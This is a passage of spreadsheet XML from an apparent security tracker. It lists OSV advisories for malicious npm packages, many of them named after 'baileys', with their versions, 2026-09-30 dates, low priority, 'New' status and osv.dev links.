        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr"/>
      <c r="S23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@bellaxchuu/crystalred (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17344</t>
        </is>
      </c>
      <c r="D237" s="5" t="inlineStr"/>
      <c r="E237" s="5" t="inlineStr"/>
      <c r="F237" s="5" t="inlineStr"/>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/familyxtrx</t>
        </is>
      </c>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr"/>
      <c r="S23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@bellaxchuu/familyxtrx (npm), version(s): 0.1.5.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17344</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17345</t>
        </is>
      </c>
      <c r="D238" s="5" t="inlineStr"/>
      <c r="E238" s="5" t="inlineStr"/>
      <c r="F238" s="5" t="inlineStr"/>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/flowblue</t>
        </is>
      </c>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr"/>
      <c r="S23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@bellaxchuu/flowblue (npm), version(s): 1.5.7.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17345</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17346</t>
        </is>
      </c>
      <c r="D239" s="5" t="inlineStr"/>
      <c r="E239" s="5" t="inlineStr"/>
      <c r="F239" s="5" t="inlineStr"/>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/privatebails</t>
        </is>
      </c>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr"/>
      <c r="S23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@bellaxchuu/privatebails (npm), version(s): 1.4.1.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17346</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17347</t>
        </is>
      </c>
      <c r="D240" s="5" t="inlineStr"/>
      <c r="E240" s="5" t="inlineStr"/>
      <c r="F240" s="5" t="inlineStr"/>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/skyblue</t>
        </is>
      </c>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr"/>
      <c r="S24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@bellaxchuu/skyblue (npm), version(s): 2.1.2.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17347</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17348</t>
        </is>
      </c>
      <c r="D241" s="5" t="inlineStr"/>
      <c r="E241" s="5" t="inlineStr"/>
      <c r="F241" s="5" t="inlineStr"/>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/teambails</t>
        </is>
      </c>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr"/>
      <c r="S24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@bellaxchuu/teambails (npm), version(s): 1.1.9, 1.1.8, 1.1.6, 1.1.4, 1.2.4.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17348</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17349</t>
        </is>
      </c>
      <c r="D242" s="5" t="inlineStr"/>
      <c r="E242" s="5" t="inlineStr"/>
      <c r="F242" s="5" t="inlineStr"/>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/velvetry</t>
        </is>
      </c>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr"/>
      <c r="S24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@bellaxchuu/velvetry (npm), version(s): 0.1.4, 0.1.3.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17349</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17350</t>
        </is>
      </c>
      <c r="D243" s="5" t="inlineStr"/>
      <c r="E243" s="5" t="inlineStr"/>
      <c r="F243" s="5" t="inlineStr"/>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/xtrxbails</t>
        </is>
      </c>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr"/>
      <c r="S24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@bellaxchuu/xtrxbails (npm), version(s): 0.0.8.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17350</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17351</t>
        </is>
      </c>
      <c r="D244" s="5" t="inlineStr"/>
      <c r="E244" s="5" t="inlineStr"/>
      <c r="F244" s="5" t="inlineStr"/>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr">
        <is>
          <t>npm:@bottino/baileys</t>
        </is>
      </c>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr"/>
      <c r="S24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@bottino/baileys (npm), version(s): 1.0.14, 1.0.13, 1.0.12, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.5, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17351</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17352</t>
        </is>
      </c>
      <c r="D245" s="5" t="inlineStr"/>
      <c r="E245" s="5" t="inlineStr"/>
      <c r="F245" s="5" t="inlineStr"/>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys</t>
        </is>
      </c>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr"/>
      <c r="S24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 (npm), version(s): 1.0.3, 1.0.1.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17352</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17353</t>
        </is>
      </c>
      <c r="D246" s="5" t="inlineStr"/>
      <c r="E246" s="5" t="inlineStr"/>
      <c r="F246" s="5" t="inlineStr"/>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr">
        <is>
          <t>npm:@fhkryxv/baileys-new</t>
        </is>
      </c>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr"/>
      <c r="S24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@fhkryxv/baileys-new (npm), version(s): 0.3.22.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17353</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17354</t>
        </is>
      </c>
      <c r="D247" s="5" t="inlineStr"/>
      <c r="E247" s="5" t="inlineStr"/>
      <c r="F247" s="5" t="inlineStr"/>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr">
        <is>
          <t>npm:@hanzofc/baileys</t>
        </is>
      </c>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr"/>
      <c r="S24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@hanzofc/baileys (npm), version(s): 7.0.1, 7.0.0.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17354</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17355</t>
        </is>
      </c>
      <c r="D248" s="5" t="inlineStr"/>
      <c r="E248" s="5" t="inlineStr"/>
      <c r="F248" s="5" t="inlineStr"/>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr">
        <is>
          <t>npm:@ikanngeming/ikannbail</t>
        </is>
      </c>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr"/>
      <c r="S24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@ikanngeming/ikannbail (npm), version(s): 1.0.7, 1.0.6, 1.0.5, 1.0.4, 1.0.3, 1.0.2.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17355</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17356</t>
        </is>
      </c>
      <c r="D249" s="5" t="inlineStr"/>
      <c r="E249" s="5" t="inlineStr"/>
      <c r="F249" s="5" t="inlineStr"/>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikkysingle</t>
        </is>
      </c>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr"/>
      <c r="S24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@ikyyjee/ikkysingle (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17356</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17357</t>
        </is>
      </c>
      <c r="D250" s="5" t="inlineStr"/>
      <c r="E250" s="5" t="inlineStr"/>
      <c r="F250" s="5" t="inlineStr"/>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysinggle</t>
        </is>
      </c>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr"/>
      <c r="S25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@ikyyjee/ikyysinggle (npm), version(s): 1.7.7.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17357</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17358</t>
        </is>
      </c>
      <c r="D251" s="5" t="inlineStr"/>
      <c r="E251" s="5" t="inlineStr"/>
      <c r="F251" s="5" t="inlineStr"/>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>npm:@ikyyjee/ikyysingle</t>
        </is>
      </c>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr"/>
      <c r="S25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@ikyyjee/ikyysingle (npm), version(s): 1.7.8.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17358</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17359</t>
        </is>
      </c>
      <c r="D252" s="5" t="inlineStr"/>
      <c r="E252" s="5" t="inlineStr"/>
      <c r="F252" s="5" t="inlineStr"/>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>npm:@japofc/baileys</t>
        </is>
      </c>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr"/>
      <c r="S25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@japofc/baileys (npm), version(s): 2.4.3, 2.4.2, 2.4.1, 2.4.0, 2.3.0, 2.2.0, 2.1.0.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17359</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17360</t>
        </is>
      </c>
      <c r="D253" s="5" t="inlineStr"/>
      <c r="E253" s="5" t="inlineStr"/>
      <c r="F253" s="5" t="inlineStr"/>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>npm:@jojoxyz/condemnedforce-baileys</t>
        </is>
      </c>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr"/>
      <c r="S25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@jojoxyz/condemnedforce-baileys (npm), version(s): 2.3.0.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17360</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17361</t>
        </is>
      </c>
      <c r="D254" s="5" t="inlineStr"/>
      <c r="E254" s="5" t="inlineStr"/>
      <c r="F254" s="5" t="inlineStr"/>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>npm:@kanaraa/baileys</t>
        </is>
      </c>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr"/>
      <c r="S25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@kanaraa/baileys (npm), version(s): 3.5.2, 3.5.1, 3.4.7, 3.4.6, 3.4.5, 3.4.4, 3.4.2, 3.5.0, 3.4.1, 3.4.0, 3.3.0, 3.2.0, 3.1.9, 3.1.8.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17361</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17362</t>
        </is>
      </c>
      <c r="D255" s="5" t="inlineStr"/>
      <c r="E255" s="5" t="inlineStr"/>
      <c r="F255" s="5" t="inlineStr"/>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr">
        <is>
          <t>npm:@kelvdra/baileys</t>
        </is>
      </c>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr"/>
